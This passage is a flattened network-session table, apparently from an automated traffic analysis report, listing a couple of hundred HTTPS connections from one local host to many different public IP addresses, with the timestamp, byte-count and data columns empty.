                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12380192.168.2.2351780199.201.105.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12381192.168.2.2345290186.84.56.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12382192.168.2.2347156125.17.216.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12383192.168.2.2352976218.226.221.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12384192.168.2.2354784145.154.41.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12385192.168.2.2335098180.103.66.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12386192.168.2.234855671.156.59.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12387192.168.2.235421264.68.6.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12388192.168.2.2338828205.95.160.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12389192.168.2.233737286.180.79.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12390192.168.2.2338312101.23.168.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12391192.168.2.234668258.235.11.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12392192.168.2.2345022193.171.47.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12393192.168.2.235809271.104.162.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12394192.168.2.235453293.131.198.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12395192.168.2.2340818166.120.97.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12396192.168.2.236035080.253.72.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12397192.168.2.234558261.59.172.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12398192.168.2.2341764188.33.86.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12399192.168.2.235163873.99.17.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12400192.168.2.2351332220.203.9.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12401192.168.2.235109281.207.242.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12402192.168.2.233552450.16.164.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12403192.168.2.235601077.6.96.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12404192.168.2.2358166181.63.150.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12405192.168.2.2357680103.12.224.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12406192.168.2.234878834.242.108.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12407192.168.2.235338458.15.233.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12408192.168.2.236030279.92.81.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12409192.168.2.235782462.86.64.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12410192.168.2.235088636.117.140.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12411192.168.2.234296094.151.180.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12412192.168.2.234243082.195.24.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12413192.168.2.2335030179.193.35.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12414192.168.2.2356200122.181.108.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12415192.168.2.2358882218.14.87.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12416192.168.2.233813825.107.89.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12417192.168.2.235508490.240.107.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12418192.168.2.236056637.225.108.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12419192.168.2.234096465.71.144.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12420192.168.2.2347288180.125.70.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12421192.168.2.2341452187.150.51.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12422192.168.2.235517865.61.7.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12423192.168.2.2333154202.183.221.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12424192.168.2.234958484.81.115.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12425192.168.2.2350622141.98.251.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12426192.168.2.2338800210.48.70.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12427192.168.2.234284674.189.92.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12428192.168.2.2335912222.167.84.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12429192.168.2.2357834209.47.146.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12430192.168.2.2360280148.102.152.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12431192.168.2.2336334117.108.106.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12432192.168.2.2335938138.205.5.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12433192.168.2.2343812150.89.102.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12434192.168.2.235980474.3.87.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12435192.168.2.236051219.151.20.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12436192.168.2.2339686168.56.137.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12437192.168.2.234740089.2.94.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12438192.168.2.2346442108.206.213.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12439192.168.2.2355648136.24.246.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12440192.168.2.233915083.141.134.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12441192.168.2.2343448190.62.5.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12442192.168.2.234030013.116.89.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12443192.168.2.236079276.113.73.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12444192.168.2.2342008135.88.196.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12445192.168.2.2353580100.195.61.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12446192.168.2.2342586131.24.129.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12447192.168.2.235816498.4.34.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12448192.168.2.2350784168.227.141.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12449192.168.2.235643470.83.17.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12450192.168.2.2350346198.86.160.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12451192.168.2.2353600114.1.194.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12452192.168.2.233549637.235.49.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12453192.168.2.2343022166.82.119.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12454192.168.2.233614251.163.248.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12455192.168.2.235379282.134.75.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12456192.168.2.2352762198.225.216.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12457192.168.2.234413668.124.140.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12458192.168.2.235670650.112.232.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12459192.168.2.2341588202.250.116.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12460192.168.2.2359286153.27.224.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12461192.168.2.2337356101.12.0.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12462192.168.2.234209462.61.219.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12463192.168.2.234245235.23.39.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12464192.168.2.234083418.28.49.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12465192.168.2.236096012.78.73.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12466192.168.2.235426451.37.165.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12467192.168.2.234033613.46.129.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12468192.168.2.234499251.169.165.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12469192.168.2.2359132175.119.183.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12470192.168.2.2354540199.8.96.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12471192.168.2.234178681.165.23.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12472192.168.2.233388657.165.185.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12473192.168.2.234438299.224.37.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12474192.168.2.23448084.69.147.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12475192.168.2.2345130162.132.235.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12476192.168.2.2338562153.51.140.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12477192.168.2.233742489.88.134.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12478192.168.2.234372698.217.138.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12479192.168.2.2359810116.53.136.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12480192.168.2.234020217.128.80.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12481192.168.2.23607848.1.59.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12482192.168.2.2335764185.90.74.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12483192.168.2.2343076212.65.199.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12484192.168.2.234151420.51.89.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12485192.168.2.234840284.41.214.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12486192.168.2.235113880.163.230.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12487192.168.2.235624886.7.83.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12488192.168.2.235687825.54.238.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12489192.168.2.234377265.117.220.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12490192.168.2.234058659.57.233.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12491192.168.2.234097044.195.143.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12492192.168.2.234294852.185.182.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12493192.168.2.2338996161.176.65.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12494192.168.2.234615484.192.164.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12495192.168.2.2339576210.206.83.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12496192.168.2.2337060157.222.31.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12497192.168.2.234018082.243.224.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12498192.168.2.235470495.241.51.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12499192.168.2.234970643.174.72.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12500192.168.2.2354554217.226.1.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12501192.168.2.235059834.142.89.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12502192.168.2.2342994117.83.162.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12503192.168.2.2352274106.52.170.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12504192.168.2.2357708112.113.86.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12505192.168.2.234164450.156.67.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12506192.168.2.2342006200.109.38.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12507192.168.2.2353564201.91.90.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12508192.168.2.236080425.103.66.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12509192.168.2.235302865.130.203.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12510192.168.2.2348632100.62.150.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12511192.168.2.233694498.216.116.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12512192.168.2.235811820.168.252.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12513192.168.2.23572882.6.21.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12514192.168.2.2352894129.119.129.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12515192.168.2.2345124189.133.84.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12516192.168.2.235652238.101.41.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12517192.168.2.2340212201.234.166.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12518192.168.2.2340474223.82.146.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12519192.168.2.2357642170.42.39.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12520192.168.2.2345846196.237.84.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12521192.168.2.2350110209.161.133.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12522192.168.2.2353762204.137.82.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12523192.168.2.234336266.242.165.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12524192.168.2.2356336204.133.234.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12525192.168.2.2354804195.173.97.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12526192.168.2.2334546133.26.61.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12527192.168.2.2360450178.134.21.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12528192.168.2.234636820.53.105.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12529192.168.2.2341274100.185.79.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12530192.168.2.2359624123.20.215.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12531192.168.2.235336059.240.208.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12532192.168.2.2336652194.100.186.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12533192.168.2.2353108108.158.61.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12534192.168.2.2351988182.15.188.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12535192.168.2.2336088117.42.132.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12536192.168.2.233637641.11.38.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12537192.168.2.235108669.209.163.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12538192.168.2.2334468140.218.131.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12539192.168.2.2338458183.45.25.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12540192.168.2.233349060.94.58.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12541192.168.2.2355564145.41.254.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12542192.168.2.2340418178.210.118.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12543192.168.2.2349476163.95.168.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12544192.168.2.2348026112.67.247.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12545192.168.2.23520288.159.189.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12546192.168.2.2340404146.158.150.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12547192.168.2.234190235.29.223.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12548192.168.2.2353238175.164.214.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12549192.168.2.235661834.138.85.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12550192.168.2.2346348199.89.95.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12551192.168.2.2350622169.58.40.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12552192.168.2.233591661.134.200.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12553192.168.2.2347026168.58.68.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12554192.168.2.2336374176.158.235.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12555192.168.2.2359628135.88.24.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12556192.168.2.235601896.62.102.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12557192.168.2.233315243.237.121.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12558192.168.2.2356082203.37.3.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12559192.168.2.2334010207.92.66.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12560192.168.2.2342722150.203.144.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12561192.168.2.23445949.221.70.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12562192.168.2.233840883.144.208.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12563192.168.2.2343274142.39.154.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12564192.168.2.2335468212.14.56.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12565192.168.2.2354482138.207.86.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12566192.168.2.233781048.70.2.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12567192.168.2.2353892101.46.219.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12568192.168.2.234496041.9.221.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12569192.168.2.2345142122.129.78.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12570192.168.2.2334098101.45.245.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12571192.168.2.2333968106.192.25.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12572192.168.2.235125872.221.244.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12573192.168.2.2359054193.212.78.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12574192.168.2.2353662125.82.25.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12575192.168.2.2354650219.249.33.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12576192.168.2.235100039.2.162.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12577192.168.2.235686220.237.104.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12578192.168.2.2341696163.231.173.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12579192.168.2.2334586169.24.130.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12580192.168.2.235650459.157.253.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12581192.168.2.2348890106.104.223.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12582192.168.2.2340596154.72.45.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12583192.168.2.236095086.61.168.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12584192.168.2.2345042176.107.209.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12585192.168.2.2351334212.195.126.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12586192.168.2.2355528121.157.126.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12587192.168.2.2348512164.237.130.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12588192.168.2.2336904167.93.170.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12589192.168.2.234995219.5.188.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12590192.168.2.2338578157.65.135.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12591192.168.2.235016052.105.19.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12592192.168.2.2333868113.81.170.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12593192.168.2.2357096174.247.123.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12594192.168.2.2340194217.172.175.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12595192.168.2.2353414172.252.142.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12596192.168.2.2359378221.52.81.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12597192.168.2.234951258.239.35.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12598192.168.2.233800668.8.239.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12599192.168.2.2342712182.91.125.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12600192.168.2.234936893.173.98.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12601192.168.2.235204493.23.223.213443
                                                TimestampBytes transferredDirectionData


